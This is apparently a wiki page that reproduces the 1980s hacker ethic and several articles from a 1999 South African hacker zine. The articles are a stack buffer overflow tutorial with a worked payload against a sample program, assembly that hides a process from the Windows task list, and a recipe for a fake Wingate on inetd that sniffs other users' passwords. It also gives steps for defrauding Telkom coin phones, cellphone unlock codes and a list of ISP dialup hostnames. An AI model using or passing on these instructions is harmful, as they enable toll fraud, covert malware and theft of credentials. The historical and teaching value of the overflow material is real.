No older revisions available
No older revisions available
~cpp
1. Access to computers-and anything which might teach you something
about the way the world works-should be unlimited and total.
Always yield to the Hands-On imperative!
2. All information should be free.
3. Mistrust Authority-Promote Decentralization.
4. Hackers should be judged by their hacking, not bogus criteria such
such degrees, age, race, or position.
5. You can create art and beauty on a computer.
6. Computers can change (your) life for the better.
80년대 윤리 강령. 90년대에 새로운 것에 기반한 것이 나왔다지만 나는 80년대 것을 선호한다. 자유롭기 때문에.
~cpp
.-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-.
Principles of Buffer Overflow explained by Jus
.-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-.
This article is an attempt to quickly and simply explain everyone's favourite
manner of exploiting daemons - The Buffer Overflow.
- Huh? -
The remote buffer overflow is a very commonly found and exploited bug in badly
coded daemons - by overflowing the stack one can cause the software to execute
a shell equal to its current UID - thus if the daemon is run as root, like
many are, a root shell will be spawned, giving full remote access.
A buffer is a block of computer memory that holds many instances of the same
data type - an array. Arrays can be static and dynamic, static being allocated
at load time and dynamic being allocated dynamically at run time. We will be
looking at dynamic buffers, or stack-based buffers, and overflowing, filling
up over the top, or breaking their boundaries.
A stack has the property of a queue of objects being placed one on top of the
other, and the last object placed on the stack will be the first one to be
removed. This is called LIFO - or last in first out. An element can be added
to the stack (PUSH) and removed (POP). A stack is made up of stack frames,
which are pushed when calling a function in code and popped when returning it.
The stack pointer (SP) always points to the top of the stack, the bottom of it
is static. PUSH and POP operations manipulate the size of the stack
dynamically at run time, and its growth will either be down the memory
addresses, or up them. This means that one could address variables in the
stack by giving their offsets from SP, but as POP's and PUSH's occur these
offsets change around. Another type of pointer points to a fixed location
within a frame (FP). This can be used for referencing variables because their
distances from the FP will not change.
- The Overflow -
A buffer overflow is what happens when more data is forced into the stack than
it can handle. We use this to change the flow of execution of a program -
hopefully by executing code of our choice, normally just to spawn a shell.
We can change the return address of a function by overwriting the entire
contents of the buffer, by overfilling it and pushing data out - this then
means that we can change the flow of the program. By filling the buffer up
with shellcode, designed to spawn a shell on the remote machine, and
overwriting the return address so that it points back into the buffer, we can
make the program run the shellcode.
This is just a simplified version of what actually happens during a buffer
overflow - there is more to it, but the basics are essential to understand if
you want to win an argument one day.
-jus (jus@security.za.net)
[ Epilogue by Wyzewun:
Time for a practical example. I did this some time ago on my Dad's Windoze box
to explain it to myself: I had downloaded a file on Win32 buffer overflows but
I really didn't feel like reading, so I figured it out myself instead. It took
me +-20 mins to do the whole thing, but at least I was keeping a log of me
trying to get it right so I can just paste it more or less unchanged here -
save, of course, for the explanations. Next time I'll get human and actually
READ UP on whatever I'm trying to do before I try DO it so I don't waste so
much damn time. :/ Anyway, here's the notes...
#include <iostream.h>
#include <string.h>
int main() {
char buffer[40];
char buffer2[20]; // This doesn't need to be smaller though
cout << "Gimmee a variable\n";
cin >> buffer;
strcpy(buffer2, buffer);
return 666; }
Because strcpy() has no bounds checking, there is an obvious buffer overflow
vulnerability here...
c:\>overflow
Gimmee a variable
12345678901234567890
It executed fine. Now lets try...
c:\>overflow
Gimmee a variable
123456789012345678901
At this point Windoze cuts in with the following...
OVERFLOW caused an invalid page fault in module OVERFLOW.EXE at 015f:00402127.
Registers:
EAX=0000029a CS=015f EIP=00402127 EFLGS=00000206
EBX=00530000 SS=0167 ESP=0063fe0c EBP=00630031
ECX=0063fdd4 DS=0167 ESI=81596754 FS=1157
EDX=00400031 ES=0167 EDI=00000000 GS=0000
Bytes at CS:EIP:
89 45 e4 50 e8 12 15 00 00 8b 45 ec 8b 08 8b 09
Stack dump:
00000000 81596754 00530000 c0000005 0063ff68 0063fe0c 0063fc3c 0063ff68
00403d18 00407190 00000000 0063ff78 bff8b537 00000000 81596754 00530000
Is this a buffer overflow bug or is this something else we are mistaking for
one? Well, let's check, we feed it a good 30 "a" characters and we look at the
values of the registers when it dies....
Registers:
EAX=0000029a CS=015f EIP=61616161 EFLGS=00000202
EBX=00530000 SS=0167 ESP=0063fe00 EBP=61616161
ECX=0063fddc DS=0167 ESI=81596628 FS=117f
EDX=00006161 ES=0167 EDI=00000000 GS=0000
Aaah, see that? EIP is 61616161 - 61 being the hex value of the "a" character,
so it's overflowing allright. Now let's exploit it. :) First off, we add the
following line into the example C++ proggy above...
cout << &buffer2 << "\n";
And when executing the program, the output we get is as follows...
0x0063FDE4
Gimmee a variable
Right, so buffer2's address is 0x0063FDE4 - and just in case that's a bit off
for some reason - we'll pad it a bit.
Padding? Right. Executing the NOP function (0x90) which most CPU's have - just
something to do nothing. That way, hopefully, when we overwrite the return
address we can land somewhere in the middle of the NOPs, and then just execute
along until we get to our shellcode. Errr, I'm not being clear, what I mean is
the buffer will look like: [NOPNOPNOPNOP] [SHELLCODE] [NOPNOPNOPNOP] [RET]
Shellcode? Right. We can execute pretty much anything we want, and as much as
I would like to have interesting shellcode, I don't have the tools to make
some on this PC, and I *really* don't feel like going online to rip somebody
else's. And so, my choice in shellcode - int 20h - program termination. :)
Right!!! So our shellcode is 2 characters, and we can feed the program 24
characters before we start overwriting the return address, so lets have 11 NOP
characters on either side of our shellcode just to make it pretty and even
looking. Let's try this out...
c:\>overflow
Gimmee a variable
릱릱릱릱릱먏 릱릱릱릱릱릀歆
c:\>
Heeey, I gave it too many characters and it didn't crash. It worked. :) That
string in hex would be 9090909090909090909090CD20909090909090909090909063FDE4,
the CD20 in the middle being interrupt 20h, and the 63FDE4 being the address
of the buffer we're overflowing, which we are setting as the return address,
namely 0x0063FDE4. Hopefully you're beginning to see the idea here. If you
would like to play around with my example file some more, I included the
binary in the general-junk directory of this issue. Have fun! ]
/// addition.
Ammendment to FK8 by Wyzewun - Released 27th December, 1999
Every single file available on buffer overflow mentions that strcpy(),
strcat(), sprintf(), vsprintf(), gets() and loops using getc(), fgetc() and
getchar() are problematic but for some reason no-one has noticed that 'cin >>'
is also a problem. So yeh, the demonstration overflow code we featured in FK8
has *two* vulnerabilities, and we were exploiting the one we didn't know
existed: It just happened to still work because of the padding, heh. ;-P
Anyway, cin is an *extremely* commonly used function in C++ code, and it ought
to be more widely known that the favoured use of it is insecure. Ditto for
improper use of an ifstream. If you insist on using iostream.h (cin and
ifstream) then use get() and getline() instead of the '>>' system.
Also, some newbies may have been confused by my comment about the buffer2
array which makes no sense. What I *meant* to say (but which got lost due to
general braindeadness at the time of writing) is that buffer2 needn't be so
much smaller than buffer1: even a single byte is enough.
Oh, and as a final correction - Pneuma's addy is satur9@punkass.com and not
the one specified in the zine. :) Right, just a small update, but a necessary
one. And watch out for FK9, coming your way in February or March 2000!
Cheers,
Wyzewun
~cpp
.-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-.
Introduction to Assembly Programming by Moe1
.-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-.
This will cover how to write your first program in assembly using DEBUG.COM as
shipped with Windows 9x and MS-DOS...
C:\party2k>debug
- a100
0C1B:0100 jmp 125
(Jumps to direction 125H)
0C1B:0102 [Enter]
- e 102 'Happy Birthday FK!!!' 0d 0a '$'
[ In function 09 of Int 21, as with most functions of int 21, the string is
terminated with a "$" character. - Ed]
- a125
0C1B:0125 MOV DX,0102
(Copies string to DX register) [Actually the Segment:Offset address of where
in memory the string is stored to DX:DS. Remember each register has a high
and low order byte? - Ed]
0C1B:0128 MOV CX,000F
(Amount of times the string will be displayed)
0C1B:012B MOV AH,09
(Copies 09 value to AH register) [09 is the function for MS-DOS to call - Ed]
0C1B:012D INT 21
(Displays string) [int 21h is the MS-DOS function call interrupt - Ed]
0C1B:012F DEC CX
(Reduces in 1 CX)
0C1B:0130 JCXZ 0134
(If CX is equal to 0 jumps to 0134)
0C1B:0132 JMP 012D
(Jumps to direction 012D)
0C1B:0134 INT 20
(Ends the program)
0C74:0136 [ENTER]
(Now we start compiling our lil codey, awww how kewt;)
- h 0136 0100
- n fkrulez.com
- rcx
CX 0000
: 0036
- w
Writing 00036 bytes
- q
c:\party2k>fkrulez
Happy Birthday FK!!!
Happy Birthday FK!!!
Happy Birthday FK!!!
Happy Birthday FK!!!
Happy Birthday FK!!!
Happy Birthday FK!!!
Happy Birthday FK!!!
Happy Birthday FK!!!
Happy Birthday FK!!!
Happy Birthday FK!!!
Happy Birthday FK!!!
Happy Birthday FK!!!
Happy Birthday FK!!!
Happy Birthday FK!!!
Happy Birthday FK!!!
So now as another practical example, let's look at how we would hide a program
from Windoze using masm32. To do this we simply pass the program's process ID
to the RegisterService() function thus registering the program as a service,
which wont show up in the windows task list.
.data ; first we define in our data section
szKernel32 db "Kernel32.dll",0
szRSP db "RegisterServiceProcess",0
.code ; now we start the code
start:
push offset szKernel32
call GetModuleHandle ; get Kernel32.dll handle
push offset szRSP
push eax
call GetProcAddress ; get function address
mov ebx, eax ; save our pointer into ebx
call GetCurrentProcessId ; get current process id
push 1 ; 1 = Register Service, 0 = Unregister Serv.
push eax ; process id
call ebx ; call RegisterServiceProcess
end start
We could do this in any language which we can access the Win32 API from
really, I just used assembly as an example because it's what we're playing
with here. :)
[ Some more additions from Wyzewun: And there you have it. If you're
interested in getting involved with Assembly Programming, look around at the
stuff available in the programming tutorials section of Packetstorm Security
and particularly the tutorial available there made by the University of
Guadalajara (don't ask me where that is) which is quite detailed. As you get
better you will find other resources for ASM coding all over the place, so
look around and you shouldn't have much trouble finding what you want. :)
PacketStorm also has some great resources for other programming languages
like C/C++, Pascal, JavaScript, Perl, Python - you name it. :) Mm, no TCL/TK
yet, but I s'pose you can pick that up at other places.
Also, try and see if you can get hold of the SAMS MS-DOS Bible - it's what
I learnt what I know about assembly from and it's a great reference for
DOS/Windoze ASM. Mmm, I'm still using the Second Edition (Covers MS-DOS 3.3)
but I'm sure there are newer versions lying around. Well, I hope. Otherwise
it won't be much use, now will it? :) ]
~cpp
.-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-.
Fun with "Trojan" Wingates by Wyzewun
.-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-.
Allright, here's a lame little idea for the purpose of abusing hacker kiddies.
Scenario: It's a Sunday afternoon. There is nothing to do. The sun is cooking
your brain and you've hardly the energy to move, let-alone actually do
something that requires an IQ above that of an oyster. What do you do?
Step One
+-====-+
Install a Sniffer on your box. There is a nice collection of sniffers at
ftp.technotronic.com/unix/network-sniffers or alternatively, if you have
friends like Vortexia who are lamer warez kiddies that can leech stuff for
you, have a NT/98 box as your gateway and install Sniffer Pro by Network
Associates on it. It's a seriously kickass proggy - Even though NAI suck. :P
Step Two
+-====-+
Anyway, so for lack of anything better to do, lets go to www.cyberarmy.com and
look at the list of Wingates. Hmmm... Bullshit, Bullshit, Bullshit - Aaah,
here's one that works - lets say - dns.gincorp.co.jp - Right, so now we have
a Wingate. Errr... So What?
Step Three
+-======-+
[drew@kung-fusion]$ cat > phjeeer << seckz
#!/bin/bash
nc dns.gincorp.co.jp 23
echo shj3esh j0or a fuqn tw1t
seckz
[drew@kung-fusion]$ chmod 755 phjeeer
Step Four
+-=====-+
Hmmm. I'm still bored. I know! I think I'll su and edit some random junk into
my /etc/inetd.conf or something...
Before Eliteness...
#telnet stream tcp nowait root /usr/local/libexec/tcpd /usr/libexec/telnetd
After Eliteness...
telnet stream tcp nowait drew /usr/local/libexec/tcpd /home/drew/phjeeer
Now we 'killall -9 -HUP inetd' - loose our connection to that lame IRC
session which wasn't even vaguely interesting anyway, and we are now left just
as bored as before.
Step Five
+-=====-+
I'm bored. I think I'll telnet into myself...
[drew@kung-fusion]$ telnet leet.bsd.box
Trying 192.168.33.3...
Connected to leet.bsd.box.
Escape character is '^]'.
Wingate>
A Wingate! Fuqn shit du0d! I'm gonna go back to www.cyberarmy.com and add
myself to the Wingate list so peeble can abj00ze me too!@#$%
And then...
+--==--==-+
Within a few hours, our sniffer logs begin to pick up all sorts of interesting
things like usernames and passwords for things people shouldn't be accessing,
lamers making fools of themselves on IRC and all sorts of funny stuff. Aaah,
at last. Entertainment at the expense of the hacker community. Who says we
aren't united, man? I *Love* these guys...
But Remember...
+--==--==--==-+
This can be dangerous and if you don't select the Wingate to abuse carefully
you may end up getting yourself in more trouble than you bargained for. Don't
be stupid. :)
~cpp
__... . . ...__
d$$^^ ^^$$b
.?$; ;$$;:;,
_. Various Phone Warez from MercEnarY ._ ,;:;,, _.
First off, let's cover phreaking the telkom tetabox fones. Note: Not the big
blues ones, those small ones you find in some places [Wyzewun: He's reffering
to Telkom's Chatterbox range. You'll recognize it coz it says "Chatterbox" on
it - imagine that :P]
This technique was picked up by me when trying to phone ppl in Johannesburg
when i was at boarding school, and lets you use telkom coin phone to phone for
free (not exactly free cause the line still gets charged just not you)...
1) You need access to the plugin point of the phone (some of the older phones
have a point where the jack can be attached to the phone, in the newer ones
the jack is already attached, therefore you need to find then point where
the jack goes into the wall instead)
2) Now dial '080' and wait for the fast engaged signal [Wyzewun: Number
unobtainable tone]
3) When you have the signal quickly take the jack out of the connection point
and put it back in, check if the phone has dialing tone and 080 is still
printed on the LCD screen, if there is no dialing tone you have moved the
line in and out too fast, if the 080 is not printed on the screen you have
moved the line too slow
4) Now the phone has 080 on the screen and then you can dial the number you
want. Also note that if you want to dial a local number you must enter the
area code.
Theory behind this: The phone is lead to believe that you are dialing a 080
(toll free) number.
Wondering: If you cut a fone line coming out a normal payphone and connect it
to so that you have a point where you can connect and disconnect as you
please, would this work? [Wyzewun: Yeh]
---
Now for How to get mastercode for unlocking cellphones...
The code is a combination of the SP code (5 digit) and phone IMEI (15 digit)
use mc1.exe and mc2.exe to get the code
To view the IMEI of the Cell, press: *#06#
Check,Activate or Remove card restrictions
#pw+XXXXXXXXXX+1# - Provider-Lock status
#pw+XXXXXXXXXX+2# - Network-Lock status
#pw+XXXXXXXXXX+3# - Provider(???)-Lock status
#pw+XXXXXXXXXX+4# - SimCard-Lock status
XXXXXXXXXX (master code) is a 10 digit code, based on the IMEI number of your
phone. Press * many times for "p" and "w".
Service Provider Codes
MTN = 655 10
Vodacom = 655 01
---
Now let's play around a bit with Net monitor on your cellphones (works wif
Nokia 51xx and 61xx maybe 3210)
Net Monitor is an extended menu on Nokia Phone. This will be a new additional
Menu on your Nokia 5110 if you installing this option. For enabling the Net
Monitor with a FBUS cable you need the DOS software PCLocals V1.3.
The Network Monitor gives you the following information:
Carrier number
MS RX level in dBM
Received signal quality
MS TX power level
C1 (path loss criterion, used for cell selection and reselection). The range
is -99 to 99
RLT (Radio Link timeout)
Timeslot
Indication of the transmitter status
Information on the network parameters
TMSI (temporary Mobile Subscriber Identity)
Cell Identification (CELL ID, number of the cell being used)
MCC (Mobile Country Code)
MNC (Mobile Network Code)
LAC (location Area Code)
Ciphering (on/off)
Hopping (on/off)
DTX (on/off)
Discarding cell barred information
Here is a 10 step description for enabling the net monitor (field test
display) using PCLocals:
Make sure to start PCLocals in plain DOS
First don't connect the phone, start the program and ignore the error message.
Configure the cable type and com port (hardware com port, not the virtual com
port like for the datasuite).
Save the settings, quit the program.
Connect the phone with the cable and start the program.
The phone "boots" as you enter the main menu and all options become available
(all menus are white colored).
Choose menu 3 (ME Memory Functions).
Choose menu 6 (Field Test Display Settings).
Now you have the following options:
Enter 243 to activate the "big" net monitor (menu 01 to 89 including menus 01
to 19).
Enter 242 to activate the "small" net monitor (menu 01 to 19).
Enter 241 to deactivate the net monitor.
Enter 240 to reset timers (?)
Don't forget to confirm your selection with hitting enter (you won't see any
reaction but it's necessary)
Quit the program, the phone "boots" and enjoy the net monitor
All following actions are done with the phone.
Go to the menu net monitor and at the test prompt enter 241 to deactivate the
net monitor completely. Furtherly you can change from the big net monitor to
the small net monitor by entering 242 at the test prompt (if menu net monitor
is still available); Note: after that you can't change to the big net monitor
again!!
Note: if u cant find pclocals use net_monitor.exe, i dunno if it gets the big
or small menu
MercEnarY sends greetz to: Depach, ReaXioN, BillaBong and IleK
All comments should be mailed to MercEnarY at mercenary@sylicon.org
;, ,;;4,
,?;;$;,__________________________________________________________________,,7$;
~cpp
__... . . ...__
d$$^^ ^^$$b
.?$; ;$$;:;,
_. SAIX Dynamic IP System explained by Moe1, Virulent and Jumpers ._ ,;:;,, _.
ndf53-01-p01.gt.saix.net
[dialup server code]-[subnet unit]-[port assigned].[province].saix.net
Province Info
-------------
*.ec.saix.net = Eastern Cape
*.fs.saix.net = Free State
*.gt.saix.net = Gauteng
*.kn.saix.net = Kwazulu Natal
*.nt.saix.net = Northen Transvaal
*.wc.saix.net = Western Cape
Dialup server codes
-------------------
bfn53 - | bfn53-01.fs.saix.net | Bloemfontein dial up
bfw25 - | bfw25-01.saix.net | Beaufort West dial up
blm53 - | blm53-01-23.fs.saix.net | Bethlehem dial up
bso36 - | bso36-01.ec.saix.net | Bisho dial up
cbs53 - | cbs53-01.wc.saix.net | Cape town dial up
cis25 - | cis25-01.wc.saix.net | Christiana dial up
cn53 - | cn53-01.wc.saix.net | Riversdale dial up
ctb53 - | ctb53-01.wc.saix.net | Bellville dial up
dps53 - | dps53-01.kn.saix.net | Durban dial up
el25 - | el25-01.ec.saix.net | East London dial up
epi53 - | epi53-01.kn.saix.net | Empangeni dial up
gfr25 - | gfr25-01-s1.saix.net | Graaff-Reinet dial up
gw53 - | gw53-01.ec.saix.net | George dial up
hwh53 - | hwh53-01.gt.saix.net | Halfway House dial up
kby53 - | kby53-01-.fs.saix.net | Kimberley dial up
kdp53 - | kdp53-01.gt.saix.net | Krugersdorp dial up
kp53 - | kp53-01.nt.saix.net | Klerksdorp dial up
kmp53 - | kmp53-01.gt.saix.net | Kempton Park dial up
kvn53 - | kvn53-01.gt.saix.net | Kelvinia dial up
lt53 - | lt53-01-01.nt.saix.net | Louis Trichardt dial up
lys53 - | lys53-01.kn.saix.net | Ladysmith dial up
npt53 - | npt53-01.nt.saix.net | Nelspruit dial up
pc36 - | pc36-01.nt.saix.net | Potchefstroom dial up
pgb53 - | pgb53-01.nt.saix.net | Pietersburg dial up
pmb53 - | pmb53-01.kn.saix.net | Pietermaritzburg dial up
ppr53 - | ppr53-01.nt.saix.net | Pretoria dial up
pss36 - | pss36-01.kn.saix.net | Port Shepstone dial up
psw53 - | psw53-01.ec.saix.net | Port Elizabeth dial up
qn25 - | qn25-01.saix.net | Queenstown dial up
rsb53 - | rsb53-01.gt.saix.net | Rosebank dial up
rst36 - | rst36-01.nt.saix.net | Rustenburg dial up
sca53 - | sca53-01.nt.saix.net | *
swm25 - | swm25-01.saix.net | Swellendam dial up
ndf53 - | ndf53-01.gt.saix.net | Newdoornfontein dial up
npt25 - | npt25-01.saix.net | Nelspruit dial up
ns53 - | ns53-01.nt.saix.net | Nylstroom dial up
nwc36 - | nwc23-01.kn.saix.net | Newcastle dial up
md25 - | md25-01.saix.net | Middelburg (Cape) dial up
md53 - | md53-01.gt.saix.net | Middelburg (Tvl) dial up
mmb25 - | mmb25-01.saix.net | Mmabathu dial up
mmb53 - | mmb53-01.nt.saix.net | Mmabathu dial up
my53 - | my53-01.wc.saix.net | Malmesbury dial up
ue53 - | ue53-01.ec.saix.net | Uitenhage dial up
uta36 - | uta36-01.ec.saix.net | Umtata dial up
up53 - | up53-01.fs.saix.net | Upington dial up
vdd53 - | vdd53-01.wc.saix.net | Vredendal dial up
ver53 - | ver53-01.nt.saix.net | Vereeniging dial up
vkr25 - | vkr25-01.saix.net | Volksrust dial up
wkm53 - | wkm53-01.fs.saix.net | Welkom dial up
wtk53 - | wtk53-01.gt.saix.net | *
woc36 - | woc36-01.wc.saix.net | Worcester dial up
;, ,;;4,
,?;;$;,__________________________________________________________________,,7$;